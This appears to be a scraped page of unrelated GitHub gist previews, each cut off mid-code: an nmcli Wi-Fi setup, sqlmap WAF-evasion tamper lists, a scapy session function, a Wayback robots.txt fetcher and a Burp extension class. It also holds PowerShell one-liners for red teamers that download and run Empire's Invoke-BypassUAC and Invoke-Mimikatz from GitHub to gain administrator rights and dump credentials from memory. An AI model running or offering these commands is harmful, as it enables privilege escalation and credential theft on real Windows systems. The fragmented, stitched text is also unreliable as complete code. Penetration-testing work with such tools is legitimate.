| # nmcli con add type wifi ifname wlp3s0 con-name work-wifi ssid work-ssid | |
| # nmcli con edit id work-wifi | |
| nmcli> set ipv4.method auto | |
| nmcli> set 802-1x.eap peap | |
| nmcli> set 802-1x.phase2-auth mschapv2 | |
| nmcli> set 802-1x.identity myusername | |
| nmcli> set 802-1x.password mypassword | |
| nmcli> set wifi-sec.key-mgmt wpa-eap | |
| nmcli> save | |
| nmcli> activate |
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` | |
| # Microsoft access | |
| ``` |
| #From here https://pen-testing.sans.org/blog/2017/10/13/scapy-full-duplex-stream-reassembly | |
| def full_duplex(p): | |
| sess = "Other" | |
| if 'Ether' in p: | |
| if 'IP' in p: | |
| if 'TCP' in p: | |
| sess = str(sorted(["TCP", p[IP].src, p[TCP].sport, p[IP].dst, p[TCP].dport],key=str)) | |
| elif 'UDP' in p: | |
| sess = str(sorted(["UDP", p[IP].src, p[UDP].sport, p[IP].dst, p[UDP].dport] ,key=str)) |
This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation
| ''' | |
| basictable | |
| Copyright (c) 2017 Rich Kelley | |
| Contact: | |
| @RGKelley5 | |
| RK5DEVMAIL[A T]gmail[D O T]com | |
| www.bytesdarkly.com | |
| License: MIT |
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
| from burp import IScanIssue | |
| class CustomIssue(IScanIssue): | |
| def __init__(self, BasePair, Confidence='Certain', IssueBackground=None, IssueDetail=None, IssueName='Python Scripter generated issue', RemediationBackground=None, RemediationDetail=None, Severity='High'): | |
| self.HttpMessages=[BasePair] # list of HTTP Messages | |
| self.HttpService=BasePair.getHttpService() # HTTP Service | |
| self.Url=BasePair.getUrl() # Java URL | |
| self.Confidence = Confidence # "Certain", "Firm" or "Tentative" | |
| self.IssueBackground = IssueBackground # String or None | |
| self.IssueDetail = IssueDetail # String or None |